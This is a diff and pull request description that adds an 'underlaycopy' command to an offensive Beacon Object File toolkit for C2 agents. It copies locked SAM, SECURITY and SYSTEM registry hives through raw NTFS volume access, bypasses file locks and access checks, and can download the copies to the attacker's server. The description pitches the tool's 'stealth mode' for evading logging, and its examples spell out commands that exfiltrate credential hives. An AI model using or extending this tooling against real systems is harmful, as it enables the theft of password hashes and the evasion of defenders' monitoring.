+WINBASEAPI int WINAPI KERNEL32$WideCharToMultiByte (UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);
+WINBASEAPI int WINAPI KERNEL32$MultiByteToWideChar (UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
+WINBASEAPI DWORD WINAPI KERNEL32$GetFileAttributesW (LPCWSTR lpFileName);
+WINBASEAPI WINBOOL WINAPI KERNEL32$CreateDirectoryW (LPCWSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
+WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString);
+WINBASEAPI WINBOOL WINAPI KERNEL32$GetComputerNameA (LPSTR lpBuffer, LPDWORD nSize);
+WINBASEAPI WINBOOL WINAPI KERNEL32$DeviceIoControl (HANDLE hDevice, DWORD dwIoControlCode, LPVOID lpInBuffer, DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesReturned, LPOVERLAPPED lpOverlapped);
+
+#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
+#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr)
+#define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size)
+
+//MSVCRT
+WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
+WINBASEAPI int __cdecl MSVCRT$memcmp(const void *_Buf1,const void *_Buf2,size_t _Size);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...);
+WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg);
+WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str);
+DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2);
+DECLSPEC_IMPORT char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src);
+DECLSPEC_IMPORT char * __cdecl MSVCRT$strrchr(const char *_Str, int _Ch);
+WINBASEAPI void *__cdecl MSVCRT$calloc(size_t _NumOfElements, size_t _SizeOfElements);
+WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
+
+//NTDLL
+WINBASEAPI NTSTATUS NTAPI NTDLL$NtCreateFile(PHANDLE FileHandle,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PIO_STATUS_BLOCK IoStatusBlock,PLARGE_INTEGER AllocationSize,ULONG FileAttributes,ULONG ShareAccess,ULONG CreateDisposition,ULONG CreateOptions,PVOID EaBuffer,ULONG EaLength);
+WINBASEAPI NTSTATUS NTAPI NTDLL$NtClose(HANDLE Handle);
+WINBASEAPI NTSTATUS NTAPI NTDLL$NtReadFile(HANDLE FileHandle,HANDLE Event,PIO_APC_ROUTINE ApcRoutine,PVOID ApcContext,PIO_STATUS_BLOCK IoStatusBlock,PVOID Buffer,ULONG Length,PLARGE_INTEGER ByteOffset,PULONG Key);
+WINBASEAPI NTSTATUS NTAPI NTDLL$NtWriteFile(HANDLE FileHandle,HANDLE Event,PIO_APC_ROUTINE ApcRoutine,PVOID ApcContext,PIO_STATUS_BLOCK IoStatusBlock,PVOID Buffer,ULONG Length,PLARGE_INTEGER ByteOffset,PULONG Key);
+WINBASEAPI VOID NTAPI NTDLL$RtlInitUnicodeString(PUNICODE_STRING DestinationString,PCWSTR SourceString);
+WINBASEAPI VOID NTAPI NTDLL$RtlZeroMemory(PVOID Destination,SIZE_T Length);
+

--- a/Creds-BOF/creds.axs
+++ b/Creds-BOF/creds.axs
@@ -76,9 +76,52 @@ cmd_hashdump.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
     ax.execute_alias(id, cmdline, `execute bof ${bof_path}`, "BOF implementation: hashdump", hook);
 });
 
+
+
+var cmd_underlaycopy = ax.create_command("underlaycopy", "Copy file using low-level NTFS access (MFT or Metadata mode)", "underlaycopy MFT C:\\Windows\\System32\\notepad.exe -w C:\\temp\\notepad_copy.exe");
+cmd_underlaycopy.addArgString("mode", true, "Copy mode: MFT or Metadata");
+cmd_underlaycopy.addArgString("source", true, "Source file path");
+cmd_underlaycopy.addArgFlagString("-w", "destination", "Destination file path (required if --download is not used)", "");
+cmd_underlaycopy.addArgBool("--download", "Download file to server instead of saving to disk");
+cmd_underlaycopy.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
+    let mode = parsed_json["mode"];
+    let source = parsed_json["source"];
+    let dest = parsed_json["destination"] || "";
+    let download = parsed_json["--download"] ? 1 : 0;
+
+    if (mode !== "MFT" && mode !== "Metadata") {
+        ax.console_message(id, "Error: Mode must be 'MFT' or 'Metadata'", "error");
+        return;
+    }
+
+    // If destination starts with '--', it's likely a flag, not a destination path
+    if (dest && dest.startsWith("--")) {
+        dest = "";
+    }
+
+    if (!download && !dest) {
+        ax.console_message(id, "Error: Either destination path or --download option must be provided", "error");
+        return;
+    }
+
+    // Always pass destination (empty string if not provided)
+    // The order matters: mode, source, dest, download
+    let bof_params = ax.bof_pack("cstr,cstr,cstr,int", [mode, source, dest || "", download]);
+    // Map architecture: x32 -> x86, x64 -> x64
+    let arch = ax.arch(id);
+    let arch_suffix = (arch === "x32") ? "x86" : arch;
+    let bof_path = ax.script_dir() + "_bin/underlaycopy." + arch_suffix + ".o";
+
+    let cmd = "execute bof";
+    if (ax.agent_info(id, "type") == "kharon") { cmd = "exec-bof"; }
+
+    let task_desc = download ? "Task: UnderlayCopy file copy and download to server" : "Task: UnderlayCopy file copy";
+    ax.execute_alias(id, cmdline, `${cmd} ${bof_path} ${bof_params}`, task_desc);
+});
+
 var group_test = ax.create_commands_group("Creds-BOF", [
     cmd_askcreds, cmd_autologon, cmd_credman, cmd_get_ntlm, cmd_hashdump, cmd_cookie_monster,
-    cmd_nanodump, cmd_nanodump_ppl_dump, cmd_nanodump_ppl_medic, cmd_nanodump_ssp
+    cmd_nanodump, cmd_nanodump_ppl_dump, cmd_nanodump_ppl_medic, cmd_nanodump_ssp, cmd_underlaycopy
 ]);
 ax.register_commands_group(group_test, ["beacon", "gopher"], ["windows"], []);
 

--- a/Makefile
+++ b/Makefile
@@ -1,4 +1,4 @@
-SUBDIRS := AD-BOF Creds-BOF Elevation-BOF Execution-BOF Injection-BOF LateralMovement-BOF Postex-BOF Process-BOF SAL-BOF SAR-BOF
+SUBDIRS := AD-BOF Creds-BOF Elevation-BOF Execution-BOF Injection-BOF LateralMovement-BOF Postex-BOF Process-BOF SAL-BOF SAR-BOF UnderlayCopy-BOF
 
 .PHONY: all $(SUBDIRS) clean
 


### PR DESCRIPTION
A low-level file copy tool ported to BOF format. Copies files using direct NTFS volume access, bypassing file locks and access restrictions:
- Copy locked files (SAM, SECURITY, SYSTEM registry hives)
- Two copy modes: MFT and Metadata (FSCTL_GET_RETRIEVAL_POINTERS)
- Direct volume access using NtCreateFile/NtReadFile/NtWriteFile (stealth mode)
- Support for sparse files and data runs
- Save to disk or download to server
- Automatic filename generation for downloads (HOSTNAME_FILENAME.hive format)

```
underlaycopy <mode> <source> [-w destination] [--download]
```

#### Arguments:
- `mode`: Copy mode - `MFT` or `Metadata`
  - `MFT`: Reads file data directly from MFT records and data runs. Best for locked files (SAM, SECURITY, SYSTEM)
  - `Metadata`: Uses FSCTL_GET_RETRIEVAL_POINTERS to get file extents. Faster but may fail on locked files
- `source`: Source file path to copy (e.g., `C:\Windows\System32\config\SAM`)
- `-w destination`: Destination file path (required if `--download` is not used)
- `--download`: Download file to server instead of saving to disk. File will be saved as `HOSTNAME_FILENAME.hive` on the server

#### Features:
- **Bypass file locks**: Copy files that are locked by the system (registry hives, active processes)
- **Stealth mode**: Uses low-level NTFS APIs (NtCreateFile, NtReadFile, NtWriteFile) to minimize logging
- **Sparse file support**: Handles sparse clusters correctly (writes zeros for sparse regions)
- **Two copy modes**: 
  - MFT mode: Direct MFT record parsing - works on locked files
  - Metadata mode: Uses Windows API for extent retrieval - faster but requires file handle
- **Memory-efficient**: Uses 64KB buffers for I/O operations
- **Secure cleanup**: Clears sensitive data from memory after operations

#### Examples:
```
# Copy locked SAM registry hive using MFT mode (recommended for locked files)
underlaycopy MFT C:\Windows\System32\config\SAM -w C:\temp\SAM_copy

# Copy file using Metadata mode (faster for unlocked files)
underlaycopy Metadata C:\Windows\System32\notepad.exe -w C:\temp\notepad_copy.exe

# Download locked SECURITY hive to server (saved as HOSTNAME_SECURITY.hive)
underlaycopy MFT C:\Windows\System32\config\SECURITY --download

# Download SYSTEM hive with custom filename
underlaycopy MFT C:\Windows\System32\config\SYSTEM --download -w SYSTEM_backup
```

#### Technical Details:
- **MFT Mode**: 
  - Reads NTFS boot sector to locate MFT
  - Gets file MFT record number from GetFileInformationByHandle
  - Parses MFT record to extract $DATA attribute
  - Reads data runs and copies clusters directly from volume
  - Handles resident data (small files stored in MFT) and non-resident data (data runs)
  
- **Metadata Mode**:
  - Opens source file with FILE_FLAG_BACKUP_SEMANTICS
  - Uses FSCTL_GET_RETRIEVAL_POINTERS to get file extents
  - Copies data directly from volume using extent LCNs (Logical Cluster Numbers)
  - May fail on locked files that cannot be opened

- **Volume Access**:
  - Opens volume using NtCreateFile with `\??\C:` path
  - Reads directly from disk sectors using NtReadFile
  - Bypasses file system locks and access checks

#### Use Cases:
- Extracting locked registry hives (SAM, SECURITY, SYSTEM) for offline analysis
- Copying files locked by active processes
- Stealth file operations without triggering file system logging
- Bypassing access restrictions on system files

<details>
<summary><h5>Screenshot: Downloads Manager</h5></summary>

<img width="1436" height="128" alt="Снимок экрана 2025-11-25 в 03 33 45" src="https://github.com/user-attachments/assets/b6b64efc-a703-4609-ac39-08f1b4adeb39" />

</details>